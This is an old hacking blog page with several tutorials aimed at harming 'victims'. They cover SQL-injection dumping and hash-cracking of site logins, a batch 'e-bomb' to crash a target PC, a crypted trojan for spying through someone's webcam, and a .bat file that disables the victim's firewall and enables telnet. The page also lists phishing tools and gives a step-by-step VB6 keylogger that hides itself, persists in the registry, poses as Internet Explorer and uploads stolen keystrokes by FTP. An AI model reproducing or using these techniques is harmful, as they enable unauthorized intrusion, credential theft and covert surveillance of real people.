New Post


Monday, August 31, 2009
no image

50 Funny Computer Applications (Pranks) : Let's Have Fun With Friends

50 Funny Computer Apps (Pranks)

The products included here were not designed in any way to damage the end users machine, and have been written for entertainment purposes only.

01- AddRemove v1.00
02- Avoid v1.01
03- Back Pack Prank
04- Blue Screen of Death Prank
05- Bomb v1.02
06- Buttons Prank
07- Click Me v1.01
08- ClickStart v1.00
09- Clippy v1.00
10- Copy Cursor v1.00
11- Crazy Num Caps Scroll v1.04
12- Cursor Fun v1.01
13- Dirty Mouse v1.00
14- DownHoax v1.02
15- Email Fun v1.00
16- Enhance Your Mouse Prank
17- Exit P Prank
18- Fake Delete v3.05
19- Fake Format v1.05
20- Fake Shutdown v1.00
21- Fake Start Menu 95 v1.00
22- Flasher v1.00
23- Flip It v1.00
24- Floppy Madness v1.00
25- Follow Me v1.00
26- Gas Gripe v1.00
27- HeadAche v1.01
28- Image Capture Prank
29- IQ Test Prank
30- Message Manager Lite v1.06
31- Mouse Droppings v1.00
32- Mouse Move v1.00
33- MouseClicks v1.00
34- Password Prank v1.00
35- Pirated Software v1.00
36- Popup Prank v1.00
37- Print Me v1.00
38- Program - WAV Launcher v1.07
39- Random Burper v1.00
40- Relationship Test Prank
41- ReplaceKeys v1.00
42- Rotate v1.00
43- Screen Screw v1.00
44- Shakedown v1.00
45- Show - Hide Desktop v1.00
46- Swap Mouse Buttons Prank
47- The Finger v1.01
48- Time Traveler v1.00
49- Windows Wordpad Prank
50- Y2K Joke v2.00

Sunday, August 30, 2009
Hacking websites : How to hack websites By using SQL Injection

Hacking websites : How to hack websites By using SQL Injection

SQLI Helper to hack website
Today i am GOing to Describe What the SQL Injection IS and How It will Going to help in Hacking the Websites..
I was Asked By Warious Users To Write A Turotial About
Today I am Going to Discuss the Easiest Way to hack the Websites i.e SQL Injection Techniques.
We Will Use The Software SQLI Helper to Perform This. I have provided link for software download... just read on.

How to hack website using SQLI Helper:

SQLI Helper is handy software to hack website. You don't need to have any knowledge of SQL to hack website using SQLI Helper. Just follow the guidelines below:

1. Free DownLoad SQLI Helper to hack website.


2. Unzip the file to obtain SQLI Helper to hack website.

3. Now, when you have website hacking software, you need to find website with potential vulnerability. There are some websites that are unhackable. While finding hackable websites, it is better to search for sites with format "article.php?id=[number]" in url.

Lets consider one example which I will use in this article:

Check whether your searched victim site can be hacked by entering:'1

in address bar and hit enter. You will get error message like:

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

If you get such error message, it is confirmed that you can hack website using this method and now you can move forward to hack website.
4. Run SQLI Helper on your Computer.
SQLI Helper to hack website
5. In target field, enter (the website url you just discovered as hackable) and hit on "Inject".

6. SQLI Helper will search for columns and you will have something like this:
Website hacking software
7. Hit on "Get Database" to get:
Hacking website down
8. Select any element from "Database Name" and click on "Get Tables".
Hack website using software
9. Now, select element from table and hit on "Get Columns". I have selected "user" to get userid and password required for login.
Hacking website software
10. Now, when you know "user" table has columns "usr_login" and "usr_pass", select them and hit on "Dump Now".
How to hack website
11. You will get values like these:
password hashes cracked
12. The values achieved are actually in hash and hence you have to crack these hashes to get userlogin and password to hack website. For this, go to and crack the hash using "Crack that hash baby" button. Thus, you are now able to hack website as you have got website user id and password. Once, you get admin password, you can easily hack website.
Thus friends, now, I hope you know how to hack website using SQL Helper. Note that using this method you cannot hack every website. SQL Helper will help you to hack website in easy way. If you have any problem in usingSQL Helper to hack website,please mention it in comments.

Enjoy SQL Helper to hack website...
Thursday, August 27, 2009
Crash PC of your Enemies Using E-Bombs ! Try This Extremely Dangerous Trick at Ur Own Risk

Crash PC of your Enemies Using E-Bombs ! Try This Extremely Dangerous Trick at Ur Own Risk


An E-Bomb is some kind of program that opens many windows, and crashes the target computer. This guide can be followed by any one, but the only problem is getting the victim to open the executable file.

First of all, download this:



1. Open Notepad, and type this:

@echo off
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe
start iexplore.exe

2. Save it as File Name.bat (Remember the .bat)

3. Open "QuickBFC", the program you've just downloaded. Once open, click open in the program and browse for your batch file you made earlier. Now, you will make it into an executable file. but first, we need to change a settings of the program. Go to "Options" and select "Ghost Application" as the output type. If you don't, then a command prompt window opens and gives your file away.


Wednesday, August 26, 2009



Found this interesting...and 3000+ downloads,so sharing it.

3d analyze is a Graphics Card Emulator that can emulate all the feature of a 3d graphics card like pixelshader 1.1, 1.4, 2.0, bump maps and a lota stuff. If a game stops running on your system just because u dont have a graphics card, dont worry 3d analyze will do it for ya. run 3danalyze select the game exe, select a few options u wanna emulate and there u go the game run perfectly now.

like POP1, POP2, THE HULK, MX vs ATV are few to mention though. the list goes on if i start writing all of them here. The most basic option selection i used is as in attached screenshot... changed a bit here and there for few games....

Put one of this Graphics id in specific field

NVIDIA Geforce Ti 4600
VendorID: 4318
DeviceID: 592

NVIDIA GeforceFX 5900 ultra
VendorID: 4318
DeviceID: 816

Ati Radeon 8500
VendorID: 4098
DeviceID: 20812

Ati Radeon 9800 pro
VendorID: 4098
DeviceID: 20040
Tuesday, August 25, 2009
Hack MSN By Hacking Webcam using MSN Webcam Hack 100% Working and Tested

Hack MSN By Hacking Webcam using MSN Webcam Hack 100% Working and Tested

Hello Guys Today I am Going To Explain A Really Cool hack for MSN Users . Today I will Explain How to hack the WebCam of MSN User Using MSN Webcam Hack. It is really Possible to hack 
the Webcam of the MSN User. Its 100% working and that's why I am Sharing with you all....
Enjoy and Keep reading..

Hack webcam on MSN - Webcam Hacker

It's very easy to hack msn using this "Webcam Hacker" application to hack webcam. Simply follow the steps below to hack webcam.

1. Free Download Webcam Hacker software to hack webcam on MSN.


2. Unzip the file to obtain MSN Webcam Hacker to hack webcam.

3. In "Hack Webcam" program folder, you will see two files:
a. Server
b. Client

4. Now, crypt this server as I have explained in my article Crypter to hide our server trojan from victim antivirus and then bind this crypted server with say any .mp3 file using Binder software. Now, send this binded trojan containing file to your victim and ask him to run it on his computer to hack webcam on MSN.

5. Once he installs server on his computer, run client.exe on your computer to see something like this:

6. Enter his IP address and keep port no. same. Hit on "Connect" and then "Start Capture". Client will start downloading webcam streaming from server on victim computer. Thus, you will be able to record and thus hack webcam on msn.

7. You can try this on yourself by simply running server.exe application on your computer first and then run client.exe and hit on "Connect" (keeping 127.0.01 as IP). Then simply click on "Start Capture".

Note: Your antivirus will go mad on Webcam Hacker and will show your around 3-4 virus alerts. If you're cautious about safety, install Deep Freeze software and then try out this software to hack webcam.

That's the Whole Tutorial .Now You can Ask Your Queries and I will Try to Help you Out..
Sunday, August 23, 2009
How to call your friends with their own number Extreme Hack

How to call your friends with their own number Extreme Hack

Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack  today I am sahring With you a extremely Nice Prank or you can simply say Hack i.e "How To Call Your Friends From THeir Own Cell Number".
I was asked by many Friends to Write Tutorials about mobile hacks and Pranks . So I am Sharing My Second Mobile Extreme Prank With You all. Enjoy and Have Fun And GO on Reading...

Mobile hack to call your friends:

1. Go to and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".

4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.

5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

That All The Full Tutorial . I think have Enjoyed It reading and Well Understood What to do?
If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.


Rapidshare Download Manager 4.0 for Free Users : Works Perfectly With Rapidshare

Rapidshare Download Manager 4.0 for Free Users : Works Perfectly With Rapidshare

See in Action:

Rapidshare Download Manager for Free Users

This is a program that downloads a queue of Rapidshare links easily with great speed.

1) Just add them or use the paste function.
2) Select the folder to download to.
3) Sit back and watch it download automatically.


- Queue Autosave
- Advanced error-handeling
- Paste Function Improvment
- Minimize to tray function
- Change directory in the Queue
- Autoexecute in the Queue
- Preferred download server
- Add a Rapidshare linklist


Saturday, August 22, 2009
Hack Remote PC's Using Windows XP as Operating System Using Telnet : Complete Tutorial

Hack Remote PC's Using Windows XP as Operating System Using Telnet : Complete Tutorial

Hello Guys Today I am Going To Explain The Tutorial On Hacking By Using Telnet Service Of Windows Hacking.

NOTE: Will only work if the person you are trying to hack is using a Windows Xp operating system.
You need to know victims computers username and password. 
Have to be instant messaging victim

Open command prompt (run -> cmd -> ok) a black box should appear on your screen and type the following:

"net start telnet"

This is to start telnet in your computer. You need it started in your computer and victims computer in order to connect successfully.

So you wanna connect to your friends computer using telnet. What you'll need to do is open command prompt. Type the following...
Then type this

Okay so you dont know your victim's ip address nor the open port number. These are some ways you can get it.

-Persuade to give it to you. Tell them to open command prompt and to type in "ipconfig" and to read you the number. May be a little suspicious.
-Go to and register and follow the steps. What this does is when your victim opens the message you sent him/her, the ip address will be given to you in your read notify account.

Okay so you got the ip address now you need the port. 

What you'll need to do is disable the victim's computer's firewall to open all ports.
To do this you'll have to create and send the victim a .bat file that disables the firewall.
-open notepad
-copy and paste the following to notepad

netsh firewall set opmode disable
net start telnet
msg * Hey isn't this cool!

-save it. remember save it as a bat file. For example: Hack.bat.... save


-netsh firewall set opmode disable will turn off victims computer

-net start telnet will start the victims telnet. Remember what i said in the beginning, telnet has to be started in both computers in order to work.

-msg * well this is simply a distraction lol, you can type anything you want and it will b displayed on the victims screen. You should write a msg because when you disable the firewall on the right corner of the screen it will display a warning saying the firewall has been turned off. remember it's msg *

okay so you know the victim's ip address, the firewall is off, and telnet is started. Your ready to connect.

Open command prompt and type telnet
type this

O "ip address" [23]

should look like this:
O [21]

press enter and it should say connecting. type Y (i think it asks to press yes to continue)

username: hopefully you know it
password: hopefully doesnt have one or you know it

There are some programs that cracks the computer's password like cain and abel and ophcrack but im not gonna get into that message me if for more info.

Well that's it. Please try not to use this information for illegal 

purposes. Thank you.
Hack Tools MegaPack : Complete A to Z Tools To hack MSN ,Hotmail Yahoo Account

Hack Tools MegaPack : Complete A to Z Tools To hack MSN ,Hotmail Yahoo Account

Fake pages(Phising Pages)
MSN Fun Tools
Hotmail Hacker
MSN Flooder
Hotmail Killer
MSN Spy lite
Msn Chat Hack
MSN Password Retreiver
Hotmail Hacker Gold
Fake MSN Messanger
Fake Login Hotmail
MSN Chat Monitor and Sniff
Hotmail Brute Forcer

DISCLAIMER: DON'T USE THEM FOR ILLEGAL PURPOSES . I am Not Responsible For Any Activity. Hello Blogger Team If you Find It Inappropriate Please Delete It.


Wednesday, August 19, 2009
Writing your own undetectable keylogger to Hack AnyRemote PC You Want

Writing your own undetectable keylogger to Hack AnyRemote PC You Want

When you are done with this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable, without the victim getting suspicious. You will be able to keylog just about anyone.

This Guide will be split into 2 parts:

1. Writing your own undetectable keylogger
- The language
- Logging and storing
- Uploading logs

2. Setting it up to be un-suspicious and trustworthy
- Binding with other files
- Making sure its existence is hidden

Before we begin I want to point out that this keylogger is NOT perfect.
It will be unable to record some symbols
It will occasionally rearrange a letter with one another if the user types fast
But the passwords should easily get through.


In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not "Necessary" to have vb6 knowledge (highly recommended tho)
Download VB6 now, below

Open up VB6 and choose standard EXE.

Put on your form:
3 timers
1 label

Double-click your form (design) and you see the source of our keylogger, almost empty at this point.

Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.

Go back to the source and write the following in the "Form_Load" sub

If app.previnstance = true then end

app.taskvisible = false

Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)

Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar

There are 2 effective methods to keylog with VB6

- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:

^ tells what Lib we need for GetAsyncKeyState.

With this code placed we can start using GetAsyncKeyState commands.

To find out what key is pressed we need to use getasynckeystate as so:

If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressed
end if

Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key, you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)

Full list of KeyCode values Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only. But i want it done properly so I am going to check One key at a time. You can decide yourself what you want to do.I will show you the easy method too later on tho. Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell. Set the caption of the label to nothing. Now a full example of the letter "a" would be this:

if GetAsyncKeyState(65) <> 0 then label1.caption = label1.caption + "a" end if

So that if "a" key is pressed an "a" is added to our label. Code 65-90 is a-z To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds).
You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer If you have less interval, it might double record the keystroke, if you have more, it might miss it. To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner of the source page, or double-click the timer icon on the form design Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad) Now it records letters and numbers, not bad, but we are far from done yet. If we finished up now our logs would be one big pile of letters, pretty much unreadable. So what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces. So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks. Now, were not done just yet. We want to check if a letter is Capital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead. Now to do this, we want to use booleans (true / false), so goto the general section and write this: The keycode for capsLock is 20. We want to write capslock like this in the timer.

if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if

The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True". The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is all capital. Nice! Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean. Its a little different with shift. Shift has the keycode 16 btw. dim "shift" as boolean in the general section. just like before.

If GetasyncKeyState(16) <> 0 then
shift = true end if

So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this: example with "a" key:

if GetAsyncKeyState(65) <> 0 then
if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if

(remember to use a different letter(s) in the goto commands every time) So if Shift has been pressed, the next key being pressed will be capital.
NOTE: You can do this with numbers too to get their symbol instead. You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9. Now. 2 very important keycodes are missing on the site, so i put them here Dot: Getasynckeystate(190) Comma: Getasynckeystate(188) We are now able to goto the next step. Writing to a Text Document. Having the logs in a label is not enough. We need to write it to a textfile every now and then. This process is really simple actually. Open up the source for the second timer (Timer2) and write following. I will explain below the quote.

On Error GoTo skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1, Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""

dont worry, ill explain. The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below "Else" the "Open" creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look. the "for output as #1" just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is usefull for keeping track of when the specific log were from. In this case we only use Output and Append
"write #1, label1.caption" this writes the content of our label into file #1. "close #1" closes the file. 'Label1.caption = "" ' This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly. I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer) As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file everytime the keylogger is being opened again (usually after shutdown) So write this to the "Form_Load": So now it stores Time marks everytime its opened. NEAT! now every 30-60 seconds all logs is stored in a text document. At this point you should try debugging the file. (little blue triangle button)

you will see nothing. but the keylogger is running.. try opening notepad or something and type something. after a minute or so, stop debugging (square button right of the debug button) and check the textfile (at your chosen location) it should contain everything you wrote. If not. Re-Check the last steps. Now. an important thing we must not forget is to make it run on startup =) there are 2 ways to do that, i will explain them both and let you choose which one to use. 1: Registry keys Here we copy the file to system32 and add an autorun reg-key to it so it starts when you start the computer. here how to do it: First we want to see if it already has one startup key. go to the Form_Load section again and write this:

if Dir("c:\windows\system32\Internet Explorer.exe") <> "" then
end if

This means that if the file in system32 (Internet Explorer.exe) already exists (will explain the name later) then it does nothing but if the file does not exist, it calls the sub called "regist". which copies the file and add a registry key to it. We're gonna write the "regist" sub now: add this at the bottom of the code:

Private Sub regist()
Dim regkey
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\system32\Internet Explorer.exe"
Set regkey = CreateObject("")
regkey.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe", "c:\windows\system32\Internet Explorer.exe"
End Sub

This copies the file iteself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key to it. Thats basicly the registry method.

Here is the Other method.
2: Copy to startup method. again, start with going to the Form_Load (IF you choose to use this method) and add "startup" which calls the startup sub we are about to make. Make a new sub called startup at the bottom of the code, like this: This searches for the Specialfolder "startup" and copies itself to there with the Internet Explorer name, If you want you can add VB attributes (setattr commands), like vbhidden or vbsystem. but i dont recommand that cause i had some problems with those attributes myself

Now choose one of the methods for startup (not both of them tho) and move on.
Now The final part is the most important one.
This is where we Upload the textfile to our FTP account.
You MUST have your own ftp account for this part.
I suggest using (its a zero), there you can create a free account.
Create a free ftp account there.
Once you have your FTP account.
We need to add a Internet Transfer Control component to our form.
You do that by going to Project >> Components. (ctrl + T) Find Microsoft Internet Transfer Control 6.0 and Tick it

press ok.
Now a new item is availible in the toolbox (Inet).
drag it to your form.
select properties for it:
Protocol: icFTP
Username: (your 0catch username)
Password: your 0catch
Password Remotehost: and thats it.
Now the "URL" should say something like this:

Now we are connected to the FTP when executed.
We must use this connection to upload the logs to the FTP. we want to do that about every 90 seconds (since 90 seconds is max interval in timers). set Timer3's interval to 90000 (1½ minute) or less. then in Timer3's source write this:

On error resume next
Inet1.Execute , "PUT c:\windows\klogs.txt /" & DateTime.Date & ".txt"
Now, this finds our log (klogs.txt) and uploads it to the selected FTP, the files name will be the date of the day it is being run. This is so we can prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The "On error resume next" prevents the program from crashing if one log fails to upload. but instead tries again (errors happen rarely tho, but recommended to have) if you have a subfolder for the logs you can type "/subfolder/" & DateTime.Date & ".txt" Was that it? YES! its really that easy to upload a file. woowee!
Now. in the "LOAD" part add this:

label1.caption = ""

To make sure the label is empty when opened.
Now i promised also to show the lazy way.. which is not as good.
I DO NOT RECOMMEND USING THIS: this method uses Integer and a loop to do all keys.
In this method "i" is 1-120. "i" starts being 1, and everytime it reaches the next command it starts at "for" as 1 higher. untill 120.
All letters will be caps and alot of weird symbols will appear. "chr(i)" chr = character, "i" is again, the keycode.

Now, go to the design again and click the form itself (not any of the items inside the form) look through the options and find the Icon option. change the icon to Internet Explorer Icon

Guess what. were almost done.
We now should have a very undetectable keylogger (80-95% UD) NICE!. give it a test shot on your own computer by saving it as .EXE to your computer (debugging wont work now since we made it copy itself). At this point you should save the project to your computer, you can also make the EXE file.(Save as Internet Explorer.exe) Thats it for the first part. Get ready for part 2!

Setting it up to be trustworthy !

Now. An EXE file that appears to do nothing when opened seems a little suspicious, doesnt it? So there is a few ways to disguise it. 1. Binding it with another file. 2. Writing another program into it in VB6.

I prefer the first solution since it takes a long time to make it look like the game etc. closes when closebutton pressed. And it would take multiple forms aswell.. so we will stick with Binding with another file or game of yours.

DO NOT use minor binding tools like FreshBind or alike.
Many of these makes the output detectable..
USE nBinder PRO, nBinder only makes it slightly more detectable.

Once you have nBinder PRO its time to make the keylogger EXE.
You do that in file >> make project.EXE (Save as Internet Explorer.exe, will explain..) when the EXE is created its time to find a file (prefferably a game or alike) to bind it with.

Add the keylogger and the file to be bound with.
Right click the Keylogger (inside nBINDER) and select Options.

Tick "Execute" box (if not already ticked) and Tick "Start visible" box (if not already ticked)

Untick "Delete file at next boot" if you want the keylogger to stay in the file after first boot.
Now select options on the other file.
UNtick delete at next boot.
Now select iconfile and output name, compress the file.
Almost done now.
The reason it should be called Internet Explorer.exe and have Internet explorer icon (and copy as internet explorer.exe for that matter) is because some firewalls detects the FTP file uploading. and when the time comes when firewall asks if you want to allow the program internet connection, it will ask: Internet explorer is trying to access the internet .
Block / Remove Block. and display Internet Explorer icon.
That way it looks like its just IE that tries to get to the internet.. you can use other browsers for this aswell.. or messenger etc. Now my friend. when the file is executed. The game (or w/e) will launch immediately. when the game is exited the keylogger starts logging invisible. (and is copied to startup / added a regkey) The victim shouldnt notice a thing. and very soon you will be the owner of their passwords =).

Thats it for This TUTORIAL for keylogging.


Designed by Hackingloops.